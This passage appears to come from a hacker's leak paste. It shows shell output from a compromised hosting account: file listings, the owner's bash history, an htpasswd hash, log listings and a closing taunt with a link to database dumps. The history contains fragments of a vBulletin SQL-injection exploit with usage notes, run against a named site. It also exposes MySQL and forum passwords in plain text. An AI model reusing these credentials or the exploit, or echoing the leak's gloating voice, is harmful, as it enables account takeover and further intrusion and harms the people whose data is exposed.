  853. 35914083 drwxr-xr-x 3 nopasara nopasara 4096 Jan 7 01:53 tragedyworld.com/
  854. 35897467 drwxr-xr-x 6 nopasara nopasara 4096 Jan 6 21:25 web/
  855. 36144507 drwxr-xr-x 11 nopasara nopasara 4096 Jul 5 2010 wo/
  856. [email protected] [/home/nopasara/public_html/securityguy]# ls -lia
  857. total 5722468
  858. 36094784 drwxr-xr-x 8 nopasara nopasara 4096 Mar 20 02:37 ./
  859. 35897352 drwxr-x--- 22 nopasara nobody 4096 Feb 28 01:31 ../
  860. 36094811 -rw------- 1 nopasara nopasara 16 Mar 7 01:54 .ftpquota
  861. 36094012 -rw-r--r-- 1 nopasara nopasara 3987 Mar 2 01:23 .htaccess
  862. 37093607 drwxr-xr-x 2 nopasara nopasara 4096 Jan 26 2010 cgi-bin/
  863. 36094022 -rw-r--r-- 1 nopasara nopasara 1468465152 Nov 21 2009 dni.avi
  864. 36094931 -rw-r--r-- 1 nopasara nopasara 397 Mar 2 01:21 index.php
  865. 37322753 drwxr-xr-x 7 nopasara nopasara 4096 Nov 9 2009 leech/
  866. 36094114 -rw-r--r-- 1 nopasara nopasara 15606 Mar 2 01:21 license.txt
  867. 36094164 -rw-r--r-- 1 nopasara nopasara 210 Jan 7 02:58 php.ini
  868. 36094115 -rw-r--r-- 1 nopasara nopasara 9200 Mar 2 01:21 readme.html
  869. 36094934 -rw-r--r-- 1 nopasara nopasara 27 Sep 27 2009 robots.txt
  870. 36094031 -rw-r--r-- 1 nopasara nopasara 388 Dec 1 2009 start.png
  871. 36978690 drwxr-xr-x 3 nopasara nopasara 4096 Dec 1 2009 task/
  872. 36094935 -rw-r--r-- 1 nopasara nopasara 5612818 Sep 27 2009 webtech_2009.tar.gz
  873. 36094061 -rw-r--r-- 1 nopasara nopasara 4337 Mar 2 01:21 wp-activate.php
  874. 36094786 drwxr-xr-x 9 nopasara nopasara 4096 Mar 2 01:21 wp-admin/
  875. 36095227 -rw-r--r-- 1 nopasara nopasara 40283 Mar 2 01:21 wp-app.php
  876. 36095228 -rw-r--r-- 1 nopasara nopasara 226 Mar 2 01:21 wp-atom.php
  877. 36095229 -rw-r--r-- 1 nopasara nopasara 274 Mar 2 01:21 wp-blog-header.php
  878. 36095230 -rw-r--r-- 1 nopasara nopasara 3931 Mar 2 01:21 wp-comments-post.php
  879. 36095231 -rw-r--r-- 1 nopasara nopasara 244 Mar 2 01:21 wp-commentsrss2.php
  880. 36095232 -rw-r--r-- 1 nopasara nopasara 3177 Mar 2 01:21 wp-config-sample.php
  881. 36095233 -rw-r--r-- 1 nopasara nopasara 1742 Mar 2 01:21 wp-config.php
  882. 36094792 drwxr-xr-x 7 nopasara nopasara 4096 Mar 2 01:25 wp-content/
  883. 36095718 -rw-r--r-- 1 nopasara nopasara 1255 Mar 2 01:21 wp-cron.php
  884. 36095719 -rw-r--r-- 1 nopasara nopasara 246 Mar 2 01:21 wp-feed.php
  885. 36094858 drwxr-xr-x 8 nopasara nopasara 4096 Mar 2 01:21 wp-includes/
  886. 36096099 -rw-r--r-- 1 nopasara nopasara 1997 Mar 2 01:21 wp-links-opml.php
  887. 36096100 -rw-r--r-- 1 nopasara nopasara 2453 Mar 2 01:21 wp-load.php
  888. 36096101 -rw-r--r-- 1 nopasara nopasara 27787 Mar 2 01:21 wp-login.php
  889. 36096102 -rw-r--r-- 1 nopasara nopasara 7774 Mar 2 01:21 wp-mail.php
  890. 36096103 -rw-r--r-- 1 nopasara nopasara 494 Mar 2 01:21 wp-pass.php
  891. 36094141 -rw-r--r-- 1 nopasara nopasara 110415 Mar 2 01:21 wp-pdf.php
  892. 36096104 -rw-r--r-- 1 nopasara nopasara 224 Mar 2 01:21 wp-rdf.php
  893. 36096105 -rw-r--r-- 1 nopasara nopasara 334 Mar 2 01:21 wp-register.php
  894. 36096106 -rw-r--r-- 1 nopasara nopasara 224 Mar 2 01:21 wp-rss.php
  895. 36096107 -rw-r--r-- 1 nopasara nopasara 226 Mar 2 01:21 wp-rss2.php
  896. 36096108 -rw-r--r-- 1 nopasara nopasara 9655 Mar 2 01:21 wp-settings.php
  897. 36094025 -rw-r--r-- 1 nopasara nopasara 18644 Mar 2 01:21 wp-signup.php
  898. 36096109 -rw-r--r-- 1 nopasara nopasara 3702 Mar 2 01:21 wp-trackback.php
  899. 36096110 -rw-r--r-- 1 nopasara nopasara 3210 Mar 2 01:21 xmlrpc.php
  900. 36094150 -rw-r--r-- 1 nopasara nopasara 4379590656 Sep 10 2010 xorred.iso
  901. [email protected] [/home/nopasara]# cat .bash_history
  902. #1263692240
  903. cd public_html/
  904. #1263692243
  905. test.php
  906. #1263692248
  907. php test.php
  908. #1263692260
  909. php test.php <?php
  910. #1263692260
  911. print_r('
  912. -----------------------------------------------------------------------------
  913. vBulletin <= 3.6.4 inlinemod.php "postids" sql injection / privilege
  914. escalation by session hijacking exploit
  915. by rgod
  916. mail: retrog at alice dot it
  917. site: http://retrogod.altervista.org
  918. Works regardless of php.ini settings, you need a Super Moderator account
  919. to copy posts among threads, to be launched while admin is logged in to
  920. the control panel, this will give you full admin privileges
  921. note: this will flood the forum with empty threads even!
  922. -----------------------------------------------------------------------------
  923. ');
  924. #1263692260
  925. if ($argc<7) {
  926. #1263692260
  927. print_r('
  928. -----------------------------------------------------------------------------
  929. Usage: php '.$argv[0].' host path user pass forumid postid OPTIONS
  930. host: target server (ip/hostname)
  931. path: path to vbulletin
  932. user/pass: you need a moderator account
  933. forumid: existing forum
  934. postid: existing post
  935. Options:
  936. -p[port]: specify a port other than 80
  937. -P[ip:port]: specify a proxy
  938. Example:
  939. php '.$argv[0].' localhost /vbulletin/ rgod mypass 2 121 -P1.1.1.1:80
  940. php '.$argv[0].' localhost /vbulletin/ rgod mypass 1 143 -p81
  941. -----------------------------------------------------------------------------
  942. ');
  943. #1263692260
  944. die;
  945. #1263692260
  946. }
  947. #1263692260
  948. /*
  949. #1263692260
  950. vulnerable code in inlinemod.php near lines 185-209:
  951. #1263692260
  952. ...
  953. #1263692260
  954. #1263692260
  955. ->GPC['postids']);
  956. #1263692260
  957. dex => $postid)
  958. #1263692260
  959. dex"] != intval($postid))
  960. {
  961. unset($postids["$index"]);
  962. }
  963. }
  964. if (empty($postids))
  965. {
  966. #1263692279
  967. php test.php
  968. #1263692305
  969. php test.php studiopress.com/support sverdlov sverdlovparola 42 15513
  970. #1263692308
  971. php test.php studiopress.com/support sverdlov sverdlovparola 42 15513
  972. #1263692321
  973. php test.php studiopress.com/support/ sverdlov sverdlovparola 42 15513
  974. #1263692381
  975. php test.php studiopress.com /support/ sverdlov sverdlovparola 42 15513
  976. #1263692470
  977. php test.php studiopress.com /support/ sverdlov sverdlovparola 42 15513
  978. #1263692489
  979. Administrator
  980. #1263692493
  981. Administrator
  982. #1263692496
  983. php test.php studiopress.com /support/ sverdlov sverdlovparola 42 15513
  984. #1263692539
  985. cd ..
  986. #1263692540
  987. ls
  988. #1263692547
  989. rm .bash_history
  990. #1263692551
  991. cat .bash_h
  992. #1263692557
  993. exit
  994. #1263831540
  995. mysql -h127.0.0.1 -unopasara -psuperhostingparola nopasara_sverdlov < /home/nopasara//public_html/sverdlov.net/sverdlov.sql
  996. #1263831932
  997. mysql -h127.0.0.1 -unopasara -psuperhostingparola nopasara_sverdlov < /home/nopasara//public_html/sverdlov.net/sverdlov1.sql
  998. #1263833103
  999. exit
  1000. #1263832465
  1001. ls -la
  1002. #1263832469
  1003. ls -la
  1004. #1263832491
  1005. vim .bash_history
  1006. #1263832552
  1007. mysql -h 127.0.0.1 -unopasara -psuperhostingparola nopasara_sverdlov < sverdlov.sql
  1008. #1263832751
  1009. mysql --help|grep charset
  1010. #1263832754
  1011. mysql --help|grep char
  1012. #1263832908
  1013. cd public_html/
  1014. #1263832909
  1015. ls
  1016. #1263832912
  1017. cd sverdlov.net/
  1018. #1263832912
  1019. ls
  1020. #1263832923
  1021. vim wp-config.php
  1022. #1263837320
  1023. logou
  1024. #1263837322
  1025. logout
  1026. uname -a;w;id
  1027. cd /home/nopasara
  1028. ls -l
  1029. du -hs .
  1030. cd /home/nopasara
  1031. ls -lia
  1032. >> LOL, You're doing it wrong, idiot.
  1033. [email protected] [/home/nopasara/.htpasswds/public_html/securityguy/leech]# cat passwd
  1034. leech:204VnKl0pmERM
  1035. [email protected] [/home/nopasara]# ls -l docs
  1036. total 36044
  1037. drwxr-xr-x 2 nopasara nopasara 4096 Apr 12 2009 ./
  1038. drwx--x--x 18 nopasara nopasara 4096 Mar 20 03:01 ../
  1039. -rw-r--r-- 1 nopasara nopasara 1589323 Apr 12 2009 NIST-SP800-42.pdf
  1040. -rw------- 1 nopasara nopasara 1224696 Jan 14 2009 auditing_mac_os_x_compliance_with_the_center_for_internet_security_benchmark_using_nessus_32948
  1041. -rw------- 1 nopasara nopasara 925291 Jan 14 2009 cleaning_up_the_back_yard_a_discussion_on_your_mothers_home_network_security_32933
  1042. -rw------- 1 nopasara nopasara 903941 Jan 14 2009 covering_the_tracks_on_mac_os_x_leopard_32993
  1043. -rw------- 1 nopasara nopasara 1000759 Jan 14 2009 current_issues_in_dns_32988
  1044. -rw------- 1 nopasara nopasara 883280 Jan 14 2009 data_carving_concepts_32969
  1045. -rw------- 1 nopasara nopasara 504518 Jan 14 2009 detecting_and_preventing_anonymous_proxy_usage_32943
  1046. -rw------- 1 nopasara nopasara 1856536 Jan 14 2009 document_metadata_the_silent_killer_32974
  1047. -rw------- 1 nopasara nopasara 3193150 Jan 14 2009 era_of_spybots_a_secure_design_solution_using_intrusion_prevention_systems_32928
  1048. -rw------- 1 nopasara nopasara 825947 Jan 14 2009 evtx_and_windows_event_logging_32949
  1049. -rw------- 1 nopasara nopasara 6815322 Jan 14 2009 fibre_channel_storage_area_networks_an_analysis_from_a_security_perspective_32913
  1050. -rw------- 1 nopasara nopasara 2014858 Jan 14 2009 human_being_firewall_32998
  1051. -rw------- 1 nopasara nopasara 631031 Jan 14 2009 intel_ixp_network_processor_based_intrusion_detection_32919
  1052. -rw------- 1 nopasara nopasara 343988 Jan 14 2009 intrusion_detection_likelihood_a_riskbased_approach_32938
  1053. -rw------- 1 nopasara nopasara 516554 Jan 14 2009 iosmap_tcp_and_udp_port_scanning_on_cisco_ios_platforms_32964
  1054. -rw------- 1 nopasara nopasara 426055 Jan 14 2009 manager_bg_2009.pdf
  1055. -rw------- 1 nopasara nopasara 461473 Jan 14 2009 mining_for_malware_theres_gold_in_them_thar_proxy_logs_32959
  1056. -rw------- 1 nopasara nopasara 808979 Jan 14 2009 net_framework_rootkits_backdoors_inside_your_framework_32954
  1057. -rw------- 1 nopasara nopasara 981363 Jan 14 2009 os_and_application_fingerprinting_techniques_32923
  1058. -rw------- 1 nopasara nopasara 1083363 Jan 14 2009 paper32988.pdf
  1059. -rw------- 1 nopasara nopasara 1574638 Jan 14 2009 security_considerations_for_avaya_ess_implementation_32984
  1060. -rw------- 1 nopasara nopasara 485204 Jan 14 2009 security_incident_handling_in_small_organizations_32979
  1061. -rw------- 1 nopasara nopasara 482489 Jan 14 2009 skype_a_practical_security_analysis_32918
  1062. -rw------- 1 nopasara nopasara 470634 Jan 14 2009 social_engineering_manipulating_the_source_32914
  1063. -rw------- 1 nopasara nopasara 732651 Jan 14 2009 the_importance_of_security_awareness_training_33013
  1064. -rw------- 1 nopasara nopasara 1143981 Jan 14 2009 transparent_layer_2_firewalls_a_look_at_2_vendor_offerings_juniper_and_cisco_32978
  1065. -rw------- 1 nopasara nopasara 4844265 Jan 14 2009 valsmith_dquist_hacking_malware.pdf
  1066. [email protected] [/home/nopasara]# ls -l /usr/local/apache/domlogs/nopasara/
  1067. total 128288
  1068. drwxr-x--- 2 root nopasara 4096 Feb 28 14:26 ./
  1069. drwx--x--x 654 root wheel 765952 Mar 20 03:03 ../
  1070. -rw-r----- 2 root nopasara 39096 Mar 20 01:19 bgsecrets.oss.bg
  1071. -rw-r----- 2 root nopasara 294111 Jul 10 2009 blog.nopasara.bg
  1072. -rw-r----- 2 root nopasara 6791 Mar 16 21:06 blog.oss.bg
  1073. -rw-r----- 2 root nopasara 15280 Mar 16 21:22 cdn.oss.bg
  1074. -rw-r----- 2 root nopasara 927221 Jul 4 2009 cmdb.nopasara.bg
  1075. -rw-r----- 2 root nopasara 0 Jan 31 2010 cmdb.oss.bg
  1076. -rw-r----- 2 root nopasara 227423 Jul 4 2009 crm.nopasara.bg
  1077. -rw-r----- 2 root nopasara 0 Jan 31 2010 crm.oss.bg
  1078. -rw-r----- 2 root nopasara 101328 Mar 20 02:10 demo.oss.bg
  1079. -rw-r----- 2 root nopasara 2399652 Mar 20 01:57 emeastudio.oss.bg
  1080. -rw-r----- 2 root nopasara 0 Jan 31 00:25 eye.oss.bg
  1081. -rw-r----- 2 root nopasara 0 Aug 31 2009 ftp.nopasara.bg-ftp_log
  1082. -rw-r----- 2 root nopasara 111685373 Mar 17 12:56 ftp.oss.bg-ftp_log
  1083. -rw-r----- 2 root nopasara 29481 Dec 28 2009 hipopotuk.oss.bg
  1084. -rw-r----- 2 root nopasara 80008 Mar 20 01:44 ioscompatible.oss.bg
  1085. -rw-r----- 2 root nopasara 121645 Oct 3 13:24 logostudio.oss.bg
  1086. -rw-r----- 2 root nopasara 0 Aug 31 2009 nopasara.bg
  1087. -rw-r----- 2 root nopasara 39153 Sep 16 2009 nopasara.oss.bg
  1088. -rw-r----- 2 root nopasara 0 Dec 10 2008 nopasaran.bg
  1089. -rw-r----- 2 root nopasara 259906 Mar 20 02:54 oss.bg
  1090. -rw-r----- 2 root nopasara 104114 Feb 5 11:21 osseu.oss.bg
  1091. -rw-r----- 2 root nopasara 0 Jun 30 2009 play.nopasara.bg
  1092. -rw-r----- 2 root nopasara 0 Jul 10 2009 play.oss.bg
  1093. -rw-r----- 2 root nopasara 10374402 Mar 20 03:02 securityguy.oss.bg
  1094. -rw-r--r-- 2 root root 375448 Jul 28 2009 studio.oss.bg
  1095. -rw-r----- 2 root nopasara 74486 Mar 19 20:47 studioburgas.oss.bg
  1096. -rw-r----- 2 root nopasara 729044 Jul 4 2009 support.nopasara.bg
  1097. -rw-r----- 2 root nopasara 0 Jul 10 2009 support.oss.bg
  1098. -rw-r----- 2 root nopasara 2114965 Mar 20 02:54 sverdlov.oss.bg
  1099. -rw-r----- 2 root nopasara 72848 Mar 20 02:42 test.oss.bg
  1100. -rw-r----- 2 root nopasara 0 Jan 31 00:25 topusahostingproviders.oss.bg
  1101. -rw-r----- 2 root nopasara 0 Jan 31 00:25 tragedyworld.oss.bg
  1102. -rw-r----- 2 root nopasara 141532 Mar 20 02:53 web.oss.bg
  1103. -rw-r----- 2 root nopasara 140 Aug 1 2009 weboffice.oss.bg
  1104. -rw-r----- 2 root nopasara 137076 Mar 16 02:38 wo.oss.bg
  1105. >> Check the URL for database dumps, etc.
  1106. Fuck the skiddies, fuck the pseudo-security experts like Sverdlov, and last but not least.. fuck the cops and the stupid journalists brainwashing the innocent.
  1107. Here's the URL for the various dumps -
  1108. http://www.4shared.com/file/sy8bdPe5/pwnt4phun.html
  1109. Get back to [email protected] for non-published details, packet captures, some more database dumps, etc.